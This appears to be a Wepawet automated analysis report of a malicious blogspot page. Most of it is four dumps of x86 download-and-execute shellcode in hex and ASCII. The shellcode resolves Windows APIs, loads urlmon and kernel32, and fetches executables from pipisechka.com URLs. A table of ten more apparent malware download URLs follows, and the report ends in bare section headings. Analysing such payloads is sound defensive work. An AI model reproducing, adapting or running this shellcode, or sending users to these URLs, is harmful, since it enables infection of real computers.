59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 8a 18 8b c3 eb 17 38 18 76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 61 63 6e 74 79 32 2e 65 78 65 00 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00	.....Vd.0....@.. p...@.^.U...E.R3 ....2.@.8.u...Z] ...U..QQSVW`.].3 ..u....v<.Nx...Q .R.Q$R.q.N.u..q ...J.B`;U.u.3..7 3..E.....u.+.OQ. ....;.at....E..^ ......3...._.... ........E.a.E._^ [..U..Q.I...Ph.` ...l...3.RR.u... .E..E...U......E .P.E.u.E.r.E.l.E .m.E.o.E.n.E...E .d.E.l.E.l.E.... ...Ph].......... ...t.j.j..u..u.j .....u.@..3...W3 ..L$..\|$...._..L $..9...t.@.8.u.+ ..U....dS.E.W3.P .E.k.E.e.E.r.E.n .E.e.E.l.E.3.E.2 .E...E.d.E.l.E.l .]......PhhC.... ......E.jDP.~... .E.j.P.s.......E .P.E.PSSSSSS.u.. E.D...S.._...[.. U..QQSVWjB.r.... .3...Y.E.a.ex.E. e...~V.E.PV.Q... YP.......YYt9.F. P.;......E.P.!.. ...YYt.W.....Y.D 8.sP.E...X.E.PW. t...YYFF;.\|._^[. .U..QSf`.2.....X 8.t.@..@.]...Bu. 3.......8.v.@3.. .t.@8.u.@....3.. E..E.[..2.http:/ /pipisechka.com/ sleep/acnty2.exe .http://pipisech ka.com/sleep/cli ck.php?r=.
e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 8a 18 8b c3 eb 17 38 18 76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 67 68 69 6d 71 73 32 2e 65 78 65 00 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00 00	.....Vd.0....@.. p...@.^.U...E.R3 ....2.@.8.u...Z] ...U..QQSVW`.].3 ..u....v<.Nx...Q .R.Q$R.q.N.u..q ...J.B`;U.u.3..7 3..E.....u.+.OQ. ....;.at....E..^ ......3...._.... ........E.a.E._^ [..U..Q.I...Ph.` ...l...3.RR.u... .E..E...U......E .P.E.u.E.r.E.l.E .m.E.o.E.n.E...E .d.E.l.E.l.E.... ...Ph].......... ...t.j.j..u..u.j .....u.@..3...W3 ..L$..\|$...._..L $..9...t.@.8.u.+ ..U....dS.E.W3.P .E.k.E.e.E.r.E.n .E.e.E.l.E.3.E.2 .E...E.d.E.l.E.l .]......PhhC.... ......E.jDP.~... .E.j.P.s.......E .P.E.PSSSSSS.u.. E.D...S.._...[.. U..QQSVWjB.r.... .3...Y.E.a.ex.E. e...~V.E.PV.Q... YP.......YYt9.F. P.;......E.P.!.. ...YYt.W.....Y.D 8.sP.E...X.E.PW. t...YYFF;.\|._^[. .U..QSf`.2.....X 8.t.@..@.]...Bu. 3.......8.v.@3.. .t.@8.u.@....3.. E..E.[..2.http:/ /pipisechka.com/ sleep/ghimqs2.ex e.http://pipisec hka.com/sleep/cl ick.php?r=..
0a 0a 0a 0a 0a 0a 0a 0a e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 8a 18 8b c3 eb 17 38 18 76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 61 63 6d 71 75 78 32 2e 65 78 65 00 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00 00	.............Vd. 0....@..p...@.^. U...E.R3....2.@. 8.u...Z]...U..QQ SVW`.].3..u....v <.Nx...Q.R.Q$R.q .N.u..q ...J.B`; U.u.3..73..E.... .u.+.OQ.....;.at ....E..^......3. ..._............ E.a.E._^[..U..Q. I...Ph.`...l...3 .RR.u....E..E... U......E.P.E.u.E .r.E.l.E.m.E.o.E .n.E...E.d.E.l.E .l.E.......Ph].. ...........t.j.j ..u..u.j.....u.@ ..3...W3..L$..\|$ ...._..L$..9...t .@.8.u.+..U....d S.E.W3.P.E.k.E.e .E.r.E.n.E.e.E.l .E.3.E.2.E...E.d .E.l.E.l.]...... PhhC..........E. jDP.~....E.j.P.s .......E.P.E.PSS SSSS.u..E.D...S. ._...[..U..QQSVW jB.r.....3...Y.E .a.ex.E.e...~V.E .PV.Q...YP...... .YYt9.F.P.;..... .E.P.!.....YYt.W .....Y.D8.sP.E.. .X.E.PW.t...YYFF ;.\|._^[..U..QSf` .2.....X8.t.@..@ .]...Bu.3....... 8.v.@3...t.@8.u. @....3..E..E.[.. 2.http://pipisec hka.com/sleep/ac mqux2.exe.http:/ /pipisechka.com/ sleep/click.php? r=..
0a 0a 0a 0a 0a 0a 0a 0a e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 8a 18 8b c3 eb 17 38 18 76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 6c 65 6b 7a 76 32 2e 65 78 65 00 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00	.............Vd. 0....@..p...@.^. U...E.R3....2.@. 8.u...Z]...U..QQ SVW`.].3..u....v <.Nx...Q.R.Q$R.q .N.u..q ...J.B`; U.u.3..73..E.... .u.+.OQ.....;.at ....E..^......3. ..._............ E.a.E._^[..U..Q. I...Ph.`...l...3 .RR.u....E..E... U......E.P.E.u.E .r.E.l.E.m.E.o.E .n.E...E.d.E.l.E .l.E.......Ph].. ...........t.j.j ..u..u.j.....u.@ ..3...W3..L$..\|$ ...._..L$..9...t .@.8.u.+..U....d S.E.W3.P.E.k.E.e .E.r.E.n.E.e.E.l .E.3.E.2.E...E.d .E.l.E.l.]...... PhhC..........E. jDP.~....E.j.P.s .......E.P.E.PSS SSSS.u..E.D...S. ._...[..U..QQSVW jB.r.....3...Y.E .a.ex.E.e...~V.E .PV.Q...YP...... .YYt9.F.P.;..... .E.P.!.....YYt.W .....Y.D8.sP.E.. .X.E.PW.t...YYFF ;.\|._^[..U..QSf` .2.....X8.t.@..@ .]...Bu.3....... 8.v.@3...t.@8.u. @....3..E..E.[.. 2.http://pipisec hka.com/sleep/le kzv2.exe.http:// pipisechka.com/s leep/click.php?r =.

Additional (potential) malware:

URL	Type	Hash
http://afsharteam1.com/win/setup.exe	N/A	N/A
http://pipisechka.com/sleep/acmqux2.exe	N/A	N/A
http://pipisechka.com/sleep/acnty2.exe	N/A	N/A
http://pipisechka.com/sleep/cdkpsv7.exe	N/A	N/A
http://pipisechka.com/sleep/click.php?r=	N/A	N/A
http://pipisechka.com/sleep/fptv2.exe	N/A	N/A
http://pipisechka.com/sleep/ghimqs2.exe	N/A	N/A
http://pipisechka.com/sleep/gnbiz2.exe	N/A	N/A
http://pipisechka.com/sleep/lekzv2.exe	N/A	N/A
http://pipisechka.com/sleep/sdgsg5.exe	N/A	N/A

Wepawet (alpha)

Analysis report for http://bertilladingman36429.blogspot.com/

Sample Overview

Detection results

Exploits

Deobfuscation results

Evals

Writes

Network Activity

Requests

Redirects

ActiveX controls

Shellcode and Malware